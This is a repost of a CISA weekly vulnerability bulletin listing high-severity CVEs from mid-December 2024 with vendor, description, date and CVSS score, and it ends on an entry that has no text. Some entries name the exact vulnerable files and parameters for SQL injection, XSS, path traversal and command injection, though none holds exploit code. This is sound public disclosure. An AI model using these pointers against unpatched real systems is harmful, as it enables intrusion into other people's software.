Bulletins: Vulnerability Summary for the Week of December 16, 2024

Jan 27, 2025

—

Source URL: https://www.cisa.gov/news-events/bulletins/sb24-358
Source: Bulletins
Title: Vulnerability Summary for the Week of December 16, 2024

Feedly Summary:
High Vulnerabilities

PrimaryVendor — Product
Description
Published
CVSS Score
Source Info

1000 Projects–Attendance Tracking Management System
A vulnerability has been found in 1000 Projects Attendance Tracking Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /student/check_student_login.php. The manipulation of the argument student_emailid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
7.3
CVE-2024-12787

Adobe–Acrobat Reader
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2024-12-19
7.8
CVE-2022-44512

Adobe–Acrobat Reader
Acrobat Reader DC version 22.001.20085 (and earlier), 20.005.3031x (and earlier) and 17.012.30205 (and earlier) are affected by a use-after-free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
2024-12-19
7.8
CVE-2022-44514

Aleksander Novikov–Metrika
Cross-Site Request Forgery (CSRF) vulnerability in Aleksander Novikov Metrika allows Cross Site Request Forgery.This issue affects Metrika: from n/a through 1.2.
2024-12-16
7.1
CVE-2024-54420

Alok Tiwari–Amazon Product Price
Cross-Site Request Forgery (CSRF) vulnerability in Alok Tiwari Amazon Product Price allows Stored XSS.This issue affects Amazon Product Price: from n/a through 1.1.
2024-12-16
7.1
CVE-2024-54439

Amol Nirmala Waman–Navayan CSV Export
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Amol Nirmala Waman Navayan CSV Export allows Blind SQL Injection.This issue affects Navayan CSV Export: from n/a through 1.0.9.
2024-12-16
9.3
CVE-2024-55988

AMS Nexe Iberica–Mimoos
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in AMS Nexe Iberica Mimoos allows SQL Injection.This issue affects Mimoos: from n/a through 1.2.
2024-12-16
8.5
CVE-2024-55974

Andy Chapman–ECT Social Share
Cross-Site Request Forgery (CSRF) vulnerability in Andy Chapman ECT Social Share allows Stored XSS.This issue affects ECT Social Share: from n/a through 1.3.
2024-12-16
7.1
CVE-2024-54405

Andy Fradelakis–LeaderBoard Plugin
Cross-Site Request Forgery (CSRF) vulnerability in Andy Fradelakis LeaderBoard Plugin allows Stored XSS.This issue affects LeaderBoard Plugin: from n/a through 1.2.4.
2024-12-16
7.1
CVE-2024-54426

Antonio Gocaj–Go Animate
Cross-Site Request Forgery (CSRF) vulnerability in Antonio Gocaj Go Animate allows Stored XSS.This issue affects Go Animate: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54397

Apache Software Foundation–Apache Tomcat
Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability during JSP compilation in Apache Tomcat permits an RCE on case insensitive file systems when the default servlet is enabled for write (non-default configuration). This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.1, from 10.1.0-M1 through 10.1.33, from 9.0.0.M1 through 9.0.97. Users are recommended to upgrade to version 11.0.2, 10.1.34 or 9.0.98, which fixes the issue.
2024-12-17
9.8
CVE-2024-50379

Apple–macOS
A logic issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.1. An app may be able to read arbitrary files.
2024-12-20
7.5
CVE-2024-44195

Apple–macOS
This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Sequoia 15.1. An app may be able to access user-sensitive data.
2024-12-20
7.5
CVE-2024-44211

Apple–macOS
This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.1. A person with physical access to a Mac may be able to bypass Login Window during a software update.
2024-12-20
7.5
CVE-2024-44231

Apple–macOS
A denial-of-service issue was addressed with improved input validation. This issue is fixed in visionOS 2.1, iOS 18.1 and iPadOS 18.1, iOS 17.7.1 and iPadOS 17.7.1, tvOS 18.1, macOS Sonoma 14.7.1, watchOS 11.1, macOS Ventura 13.7.1. A remote attacker may be able to cause a denial-of-service.
2024-12-20
7.5
CVE-2024-54538

Asseco Business Solutions S.A.–Wapro ERP Desktop
Wapro ERP Desktop is vulnerable to MS SQL protocol downgrade request from a server side, what could lead to an unencrypted communication vulnerable to data interception and modification.Â This issue affects Wapro ERP Desktop versions before 9.00.0.
2024-12-18
9.8
CVE-2024-4995

Asseco Business Solutions S.A.–Wapro ERP Desktop
Use of a hard-coded password for a database administrator account created during Wapro ERPÂ installation allows an attacker to retrieve embedded sensitive data stored in the database. The password is same among all Wapro ERPÂ installations.Â This issue affects Wapro ERP Desktop versions before 8.90.0.
2024-12-18
9.8
CVE-2024-4996

Autodesk–Navisworks Freedom
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-11422

Autodesk–Navisworks Freedom
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can force a Memory Corruption vulnerability. A malicious actor can leverage this vulnerability to execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-12178

Autodesk–Navisworks Freedom
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverageÂ this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-12179

Autodesk–Navisworks Freedom
A maliciously crafted DWF file, when parsed through Autodesk Navisworks, can force an Out-of-Bounds Write vulnerability. A malicious actor can leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-12192

Autodesk–Navisworks Freedom
A maliciously crafted DWFX file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-12669

Autodesk–Navisworks Freedom
A maliciously crafted DWF file, when parsed through Autodesk Navisworks, can be used to cause a Heap-based Overflow vulnerability. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.
2024-12-17
7.8
CVE-2024-12670

Avatar 3D Creator–3D Avatar User Profile
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Avatar 3D Creator 3D Avatar User Profile allows Reflected XSS.This issue affects 3D Avatar User Profile: from n/a through 1.0.0.
2024-12-16
7.1
CVE-2024-54358

axeptio–Axeptio
Improper Control of Filename for Include/Require Statement in PHP Program (‘PHP Remote File Inclusion’) vulnerability in axeptio Axeptio allows PHP Local File Inclusion.This issue affects Axeptio: from n/a through 2.5.3.
2024-12-18
8.1
CVE-2024-54270

Becky Sanders–Increase Sociability
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Becky Sanders Increase Sociability allows Reflected XSS.This issue affects Increase Sociability: from n/a through 1.3.0.
2024-12-16
7.1
CVE-2024-54395

Becton Dickinson & Co–BD BACTEC Blood Culture System
Default credentials are used in the above listed BD Diagnostic Solutions products. If exploited, threat actors may be able to access, modify or delete data, including sensitive information such as protected health information (PHI) and personally identifiable information (PII). Exploitation of this vulnerability may allow an attacker to shut down or otherwise impact the availability of the system. Note: BD Synapsysâ„¢ Informatics Solution is only in scope of this vulnerability when installed on a NUC server. BD Synapsysâ„¢ Informatics Solution installed on a customer-provided virtual machine or on the BD Kiestraâ„¢ SCU hardware is not in scope.
2024-12-17
8
CVE-2024-10476

beyondtrust — privileged_remote_access
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user.
2024-12-17
9.8
CVE-2024-12356

Blokhaus–Minterpress
Missing Authorization vulnerability in Blokhaus Minterpress allows Privilege Escalation.This issue affects Minterpress: from n/a through 1.0.5.
2024-12-16
8.8
CVE-2024-54379

blueskyy–WP-Ban-User
Cross-Site Request Forgery (CSRF) vulnerability in blueskyy WP-Ban-User allows Stored XSS.This issue affects WP-Ban-User: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54440

Bouzid Nazim Zitouni–TagGator
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Bouzid Nazim Zitouni TagGator allows Reflected XSS.This issue affects TagGator: from n/a through 1.54.
2024-12-16
7.1
CVE-2024-54390

Broadcom–CA Client Automation (ITCM)
CA Client Automation (ITCM) allows non-admin/non-root users to encrypt a string using CAF CLI and SD_ACMD CLI. This would allow the non admin user to access the critical encryption keys which further causes the exploitation of stored credentials. This fix doesn’t allow a non-admin/non-root user to execute “caf encrypt"/"sd_acmd encrypt" commands.
2024-12-17
8.8
CVE-2024-38499

Chris Carvache–eTemplates
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Chris Carvache eTemplates allows SQL Injection.This issue affects eTemplates: from n/a through 0.2.1.
2024-12-16
9.3
CVE-2024-55972

Chris Grdenberg, MultiNet Interactive AB–EduAdmin Booking
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Chris GÃ¥rdenberg, MultiNet Interactive AB EduAdmin Booking allows PHP Local File Inclusion.This issue affects EduAdmin Booking: from n/a through 5.2.0.
2024-12-16
7.5
CVE-2024-54373

Chunghwa Telecom–tbm-client
The tbm-client from Chunghwa Telecom has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user’s system.
2024-12-16
8.1
CVE-2024-12643

Chunghwa Telecom–tbm-client
The tbm-client from Chunghwa Telecom has an Arbitrary File vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability. Attackers can copy arbitrary files on the user’s system and paste them into any path, which poses a potential risk of information leakage or could consume hard drive space by copying files in large volumes.
2024-12-16
7.1
CVE-2024-12644

Chunghwa Telecom–TenderDocTransfer
TenderDocTransfer from Chunghwa Telecom has a Reflected Cross-site scripting vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use specific APIs through phishing to execute arbitrary JavaScript code in the user’s browser. Since the web server set by the application supports Node.Js features, attackers can further leverage this to run OS commands.
2024-12-16
9.6
CVE-2024-12641

Chunghwa Telecom–TenderDocTransfer
TenderDocTransfer from Chunghwa Telecom has an Arbitrary File Write vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection for the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains a Relative Path Traversal vulnerability, allowing attackers to write arbitrary files to any path on the user’s system.
2024-12-16
8.1
CVE-2024-12642

Chunghwa Telecom–topm-client
The topm-client from Chunghwa Telecom has an Arbitrary File Delete vulnerability. The application sets up a simple local web server and provides APIs for communication with the target website. Due to the lack of CSRF protection in the APIs, unauthenticated remote attackers could use these APIs through phishing. Additionally, one of the APIs contains an Absolute Path Traversal vulnerability, allowing attackers to delete arbitrary files on the user’s system.
2024-12-16
8.1
CVE-2024-12646

clavaque–s2Member Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions
The s2Member – Excellent for All Kinds of Memberships, Content Restriction Paywalls & Member Access Subscriptions plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 241114 via the ‘sc_get_details’ function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including user data and database configuration information, which can lead to reading, updating, or dropping database tables. The vulnerability was partially patched in version 241114.
2024-12-17
8.8
CVE-2024-8326

codename065–Download Manager
The The Download Manager plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 3.3.03. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
2024-12-19
7.3
CVE-2024-11740

Codezips–E-Commerce Site
A vulnerability was found in Codezips E-Commerce Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file signin.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
7.3
CVE-2024-12791

Codezips–E-Commerce Site
A vulnerability classified as critical was found in Codezips E-Commerce Site 1.0. Affected by this vulnerability is an unknown functionality of the file newadmin.php. The manipulation of the argument email leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
7.3
CVE-2024-12792

Codezips–E-Commerce Website
A vulnerability was found in Codezips E-Commerce Website 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /login.php. The manipulation of the argument email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-21
7.3
CVE-2024-12884

Codezips–Technical Discussion Forum
A vulnerability was found in Codezips Technical Discussion Forum 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file signinpost.php. The manipulation of the argument username leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
2024-12-19
7.3
CVE-2024-12788

collizo4sky–kk Star Ratings Rate Post & Collect User Feedbacks
The The kk Star Ratings – Rate Post & Collect User Feedbacks plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.4.10. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.
2024-12-21
7.3
CVE-2024-11977

CRUDLab–CRUDLab Google Plus Button
Cross-Site Request Forgery (CSRF) vulnerability in CRUDLab CRUDLab Google Plus Button allows Stored XSS.This issue affects CRUDLab Google Plus Button: from n/a through 1.0.2.
2024-12-16
7.1
CVE-2024-54399

Cyle Conoly–WP-HideThat
Cross-Site Request Forgery (CSRF) vulnerability in Cyle Conoly WP-HideThat allows Stored XSS.This issue affects WP-HideThat: from n/a through 1.2.
2024-12-16
7.1
CVE-2024-54415

dani-garcia–vaultwarden
vaultwarden is an unofficial Bitwarden compatible server written in Rust, formerly known as bitwarden_rs. In affected versions an attacker is capable of updating or deleting groups from an organization given a few conditions: 1. The attacker has a user account in the server. 2. The attacker’s account has admin or owner permissions in an unrelated organization. 3. The attacker knows the target organization’s UUID and the target group’s UUID. Note that this vulnerability is related to group functionality and as such is only applicable for servers who have enabled the `ORG_GROUPS_ENABLED` setting, which is disabled by default. This attack can lead to different situations: 1. Denial of service, the attacker can limit users from accessing the organization’s data by removing their membership from the group. 2. Privilege escalation, if the attacker is part of the victim organization, they can escalate their own privileges by joining a group they wouldn’t normally have access to. For attackers that aren’t part of the organization, this shouldn’t lead to any possible plain-text data exfiltration as all the data is encrypted client side. This vulnerability is patched in Vaultwarden `1.32.7`, and users are recommended to update as soon as possible. If it’s not possible to update to `1.32.7`, some possible workarounds are: 1. Disabling `ORG_GROUPS_ENABLED`, which would disable groups functionality on the server. 2. Disabling `SIGNUPS_ALLOWED`, which would not allow an attacker to create new accounts on the server.
2024-12-20
7.6
CVE-2024-56335

Dassault Systmes–ENOVIA Collaborative Industry Innovator
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator from Release 3DEXPERIENCE R2022x through Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user’s browser session.
2024-12-16
8.7
CVE-2024-12089

Dassault Systmes–ENOVIA Collaborative Industry Innovator
A stored Cross-site Scripting (XSS) vulnerability affecting ENOVIA Collaborative Industry Innovator on Release 3DEXPERIENCE R2024x allows an attacker to execute arbitrary script code in user’s browser session.
2024-12-16
8.7
CVE-2024-12090

David Cramer–Bootstrap Buttons
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in David Cramer Bootstrap Buttons allows Reflected XSS.This issue affects Bootstrap Buttons: from n/a through 1.2.
2024-12-18
7.1
CVE-2024-49677

Dell–Inventory Collector Client
Dell Inventory Collector Client, versions prior to 12.7.0, contains an Improper Link Resolution Before File Access vulnerability. A low-privilege attacker with local access may exploit this vulnerability, potentially resulting in Elevation of Privileges and unauthorized file system access.
2024-12-18
7.8
CVE-2024-47480

Dell–PowerStore
Dell PowerStore contains an Improper Neutralization of Argument Delimiters in a Command (‘Argument Injection’) vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to modification of arbitrary system files.
2024-12-19
7.1
CVE-2024-51532

Delta Electronics–DTM Soft
Delta Electronics DTM Soft deserializes objects, which could allow an attacker to execute arbitrary code.
2024-12-20
7.8
CVE-2024-12677

Derek Hamilton–PowerFormBuilder
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Derek Hamilton PowerFormBuilder allows SQL Injection.This issue affects PowerFormBuilder: from n/a through 1.0.6.
2024-12-18
8.5
CVE-2024-55983

discourse–discourse
Discourse is an open source platform for community discussion. This vulnerability only impacts Discourse instances configured to use `FileStore::LocalStore` which means uploads and backups are stored locally on disk. If an attacker knows the name of the Discourse backup file, the attacker can trick nginx into sending the Discourse backup file with a well crafted request. This issue is patched in the latest stable, beta and tests-passed versions of Discourse. Users are advised to upgrade. Users unable to upgrade can either 1. Download all local backups on to another storage device, disable the `enable_backups` site setting and delete all backups until the site has been upgraded to pull in the fix. Or 2. Change the `backup_location` site setting to `s3` so that backups are stored and downloaded directly from S3.
2024-12-19
7.5
CVE-2024-53991

Ecommerce Templates–ECT Product Carousel
Cross-Site Request Forgery (CSRF) vulnerability in Ecommerce Templates ECT Product Carousel allows Stored XSS.This issue affects ECT Product Carousel: from n/a through 1.9.
2024-12-16
7.1
CVE-2024-54412

Edgecross Consortium–Edgecross Basic Software for Windows
Incorrect Default Permissions vulnerability in Edgecross Basic Software for Windows versions 1.00 and later and Edgecross Basic Software for Developers versions 1.00 and later allows a malicious local attacker to execute an arbitrary malicious code, resulting in information disclosure, tampering with and deletion, or a denial-of-service (DoS) condition, if the product is installed in a folder other than a folder that only users with administrative privilege have permission to modify.
2024-12-19
7.8
CVE-2024-4229

Edgecross Consortium–Edgecross Basic Software for Windows
External Control of File Name or Path vulnerability in Edgecross Basic Software for Windows versions 1.00 and later and Edgecross Basic Software for Developers versions 1.00 and later allows a malicious local attacker to execute an arbitrary malicious code, resulting in information disclosure, tampering with and deletion, or a denial-of-service (DoS) condition.
2024-12-19
7.8
CVE-2024-4230

Eduardo Chiaro–addWeather
Cross-Site Request Forgery (CSRF) vulnerability in Eduardo Chiaro addWeather allows Cross Site Request Forgery.This issue affects addWeather: from n/a through 2.5.1.
2024-12-16
7.1
CVE-2024-54389

envoyproxy–envoy
Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions `sendOverloadError` is going to assume the active request exists when `envoy.load_shed_points.http1_server_abort_dispatch` is configured. If `active_request` is nullptr, only onMessageBeginImpl() is called. However, the `onMessageBeginImpl` will directly return ok status if the stream is already reset leading to the nullptr reference. The downstream reset can actually happen during the H/2 upstream reset. As a result envoy may crash. This issue has been addressed in releases 1.32.3, 1.31.5, 1.30.9, and 1.29.12. Users are advised to upgrade. Users unable to upgrade may disable `http1_server_abort_dispatch` load shed point and/or use a high threshold.
2024-12-18
7.5
CVE-2024-53270

envoyproxy–envoy
Envoy is a cloud-native high-performance edge/middle/service proxy. In affected versions envoy does not properly handle http 1.1 non-101 1xx responses. This can lead to downstream failures in networked devices. This issue has been addressed in versions 1.31.5 and 1.32.3. Users are advised to upgrade. There are no known workarounds for this issue.
2024-12-18
7.1
CVE-2024-53271

Ewald Harmsen–Mollie for Contact Form 7
Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ewald Harmsen Mollie for Contact Form 7 allows Blind SQL Injection.This issue affects Mollie for Contact Form 7: from n/a through 5.0.0.
2024-12-16
7.6
CVE-2024-55990

Filippo Bodei–WP Cookies Enabler
Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’) vulnerability in Filippo Bodei WP Cookies Enabler allows PHP Local File Inclusion.This issue affects WP Cookies Enabler: from n/a through 1.0.1.
2024-12-16
7.5
CVE-2024-54380

Fortinet–FortiClientLinux
An execution with unnecessary privileges vulnerability in the VCM engine of FortiClient for Linux versions 6.2.7 and below, version 6.4.0. may allow local users to elevate their privileges to root by creating a malicious script or program on the target machine.
2024-12-19
8.8
CVE-2020-15934

Fortinet–FortiManager
A Use After Free (CWE-416) vulnerability in FortiManager version 7.0.0, version 6.4.5 and below, version 6.2.7 and below, version 6.0.10 and below, version 5.6.10 and below, version 5.4.7 and below, version 5.2.10 and below, version 5.0.12 and below and FortiAnalyzer version 7.0.0, version 6.4.5 and below, version 6.2.7 and below, version 6.0.10 and below, version 5.6.10 and below, version 5.4.7 and below, version 5.3.11, version 5.2.10 to 5.2.4 fgfmsd daemon may allow a remote, non-authenticated attacker to execute unauthorized code as root via sending a specifically crafted request to the fgfm port of the targeted device.
2024-12-19
8.1
CVE-2021-32589

Fortinet–FortiManager
An Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) vulnerability [CWE-78] in FortiManager version 7.6.0, version 7.4.4 and below, version 7.2.7 and below, version 7.0.12 and below, version 6.4.14 and below and FortiManager Cloud version 7.4.4 and below, version 7.2.7 to 7.2.1, version 7.0.12 to 7.0.1 may allow an authenticated remote attacker to execute unauthorized code via FGFM crafted requests.
2024-12-18
7.2
CVE-2024-48889

Fortinet–FortiWAN
A relative path traversal vulnerability (CWE-23) in FortiWAN version 4.5.7 and below, 4.4 all versions may allow a remote non-authenticated attacker to delete files on the system by sending a crafted POST request. In particular, deleting specific configuration files will reset the Admin password to its default value.
2024-12-19
9.8
CVE-2021-26102

Fortinet–FortiWAN
An OS command injection (CWE-78) vulnerability in FortiWAN version 4.5.7 and below Command Line Interface may allow a local, authenticated and unprivileged attacker to escalate their privileges to root via executing a specially-crafted command.An OS command injection (CWE-78) vulnerability in FortiWAN Command Line Interface may allow a local, authenticated and unprivileged attacker to escalate their privileges to root via executing a specially-crafted command.
2024-12-19
7.8
CVE-2021-26115

Fortinet–FortiWLC
An access of uninitialized pointer (CWE-824) vulnerabilityÂ in FortiWLC versions 8.6.0, 8.5.3 and earlier may allow a local and authenticated attacker to crash the access pointÂ being managed by the controller by executing a crafted CLI command.
2024-12-19
7.3
CVE-2021-26093

Fortinet–FortiWLM
A relative path traversal in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands via specially crafted web requests.
2024-12-18
9.8
CVE-2023-34990

ForumWP–ForumWP
Deserialization of Untrusted Data vulnerability in ForumWP ForumWP allows Object Injection.This issue affects ForumWP: from n/a through 2.1.0.
2024-12-16
9.8
CVE-2024-54367

Foxit–Foxit Reader
A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a 3D page object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
2024-12-18
8.8
CVE-2024-47810

Foxit–Foxit Reader
A use-after-free vulnerability exists in the way Foxit Reader 2024.3.0.26795 handles a checkbox CBF_Widget object. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
2024-12-18
8.8
CVE-2024-49576

Fujifilm–Apeos C3070
A vulnerability has been found in Fujifilm Apeos C3070, Apeos C5570 and Apeos C6580 up to 24.8.28 and classified as critical. This vulnerability affects unknown code of the file /home/index.html#hashHome of the component Web Interface. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
2024-12-19
7.3
CVE-2024-12782

FXC Inc.–AE1021
Weak authentication issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier. If this vulnerability is exploited, the authentication may be bypassed with an undocumented specific string.
2024-12-18
7.5
CVE-2024-47397

FXC Inc.–AE1021
Improper neutralization of special elements used in an OS command (‘OS Command Injection’) issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier, which may allow a logged-in user to execute an arbitrary OS command using a crafted HTTP request.
2024-12-18
7.2
CVE-2024-53688

FXC Inc.–AE1021
Inclusion of undocumented features or chicken bits issue exists in AE1021 firmware versions 2.0.10 and earlier and AE1021PE firmware versions 2.0.10 and earlier, which may allow a logged-in user to enable telnet service.
2024-12-18
7.2
CVE-2024-54457

fzmaster @ XPD–XPD Reduce Image Filesize
Cross-Site Request Forgery (CSRF) vulnerability in fzmaster @ XPD XPD Reduce Image Filesize allows Stored XSS.This issue affects XPD Reduce Image Filesize: from n/a through 1.0.
2024-12-16
7.1
CVE-2024-54409

Gaowei Tang–Evernote Sync
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in Gaowei Tang Evernote Sync allows Reflected XSS.This issue affects Evernote Sync: from n/a through 3.0.0.
2024-12-16
7.1
CVE-2024-54422

GAxx–Gaxx Keywords
Cross-Site Request Forgery (CSRF) vulnerability in GAxx Gaxx Keywords allows Stored XSS.This issue affects Gaxx Keywords: from n/a through 0.2.
2024-12-16
7.1
CVE-2024-54438

geoWP–Geoportail Shortcode
Cross-Site Request Forgery (CSRF) vulnerability in geoWP Geoportail Shortcode allows Stored XSS.This issue affects Geoportail Shortcode: from n/a through 2.4.4.
2024-12-16
7.1
CVE-2024-54414

Get Push Monkey LLC–Push Monkey Pro Web Push Notifications and WooCommerce Abandoned Cart
Cross-Site Request Forgery (CSRF) vulnerability in Get Push Monkey LLC Push Monkey Pro – Web Push Notifications and WooCommerce Abandoned Cart allows Cross Site Request Forgery.This issue affects Push Monkey Pro – Web Push Notifications and WooCommerce Abandoned Cart: from n/a through 3.9.
2024-12-16
7.1
CVE-2024-54386

Govee–Govee Home
Incorrect authorization vulnerability in HTTP POST method in Govee Home application on Android and iOS allows remote attacker to control devices owned by other users via changing "device", "sku" and "type" fields’ values.Â This issue affects Govee Home applications on Android and iOS in versionsÂ before 5.9.
2024-12-19
10
CVE-2023-4617

gristlabs–grist-core
grist-core is a spreadsheet hosting server. A user visiting a malicious document or submitting a malicious form could have their account compromised, because it was possible to use the `javascript:` scheme with custom widget URLs and form redirect URLs. This issue has been patched in version 1.3.1. Users are advised to upgrade. Users unable to upgrade should avoid visiting documents or forms prepared by people they do not trust.
2024-12-20
8.1
CVE-2024-56357

gristlabs–grist-core
grist-core is a spreadsheet hosting server. A user visiting a malicious document and previewing an attachment could have their account compromised, because JavaScript in an SVG file would be evaluated in the context of their current page. This issue has been patched in version 1.3.2. Users are advised to upgrade. Users unable to upgrade should avoid previewing attachments in documents prepared by people they do not trust.
2024-12-20
8.1
CVE-2024-56358

gristlabs–grist-core
grist-core is a spreadsheet hosting server. A user visiting a malicious document and clicking on a link in a HyperLink cell using a control modifier (meaning for example Ctrl+click) could have their account compromised, since the link could use the javascript: scheme and be evaluated in the context of their current page. This issue has been patched in version 1.3.2. Users are advised to upgrade. Users unable to upgrade should avoid clicking on HyperLink cell links using a control modifier in documents prepared by people they do not trust.
2024-12-20
8.1
CVE-2024-56359

Gueststream–VRPConnector
Deserialization of Untrusted Data vulnerability in Gueststream VRPConnector allows Object Injection.This issue affects VRPConnector: from n/a through 2.0.1.
2024-12-18
9.8
CVE-2024-56058

Halim–KH Easy User Settings
Incorrect Privilege Assignment vulnerability in Halim KH Easy User Settings allows Privilege Escalation.This issue affects KH Easy User Settings: from n/a through 1.0.0.
2024-12-16
8.8
CVE-2024-54365

Hitachi–Hitachi Ops Center Analyzer
Authentication Bypass vulnerability in Hitachi Ops Center Analyzer on Linux, 64 bit (Hitachi Ops Center Analyzer detail view component), Hitachi Infrastructure Analytics Advisor on Linux, 64 bit (Hitachi Data Center Analytics component ).This issue affects Hitachi Ops Center Analyzer: from 10.0.0-00 before 11.0.3-00; Hitachi Infrastructure Analytics Advisor: from 2.1.0-00 through 4.4.0-00.
2024-12-17
9.4
CVE-2024-10205

HJYL–hmd
Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) vulnerability in HJYL hmd allows Stored XSS.This issue affects hmd: from n/a through 2.0.
2024-12-18
7.1
CVE-2024-54350

hosting.io, campaigns.io–WP Controller
Cross-Site Request Forgery (CSRF) vulnerability in hosting.io, campaigns.io WP Controller allows Stored XSS.This issue affects WP Controller: from n/a through 3.2.0.
2024-12-16
7.1
CVE-2024-54411

Huawei–CV81-WDM FW
There is a command injection vulnerability in Huawei terminal printer product. Successful exploitation could result in the highest privileges of the printer. (Vulnerability ID: HWPSIRT-2022-51773) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32203.
2024-12-20
9.8
CVE-2022-32203

Huawei–CV81-WDM FW
There is an insufficient input verification vulnerability in Huawei product. Successful exploitation of this vulnerability may lead to service abnormal. (Vulnerability ID: HWPSIRT-2022-76192) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32144.
2024-12-20
8.6
CVE-2022-32144

Huawei–CV81-WDM FW
There is an improper input verification vulnerability in Huawei printer product. Successful exploitation of this vulnerability may cause service abnormal. (Vulnerability ID: HWPSIRT-2022-87185) This vulnerability has been assigned a Common Vulnerabilities and Exposures (CVE) ID: CVE-2022-32204.
2024-12-20
7.5
CVE-2022-32204

Huawei–CV81-WDM FW
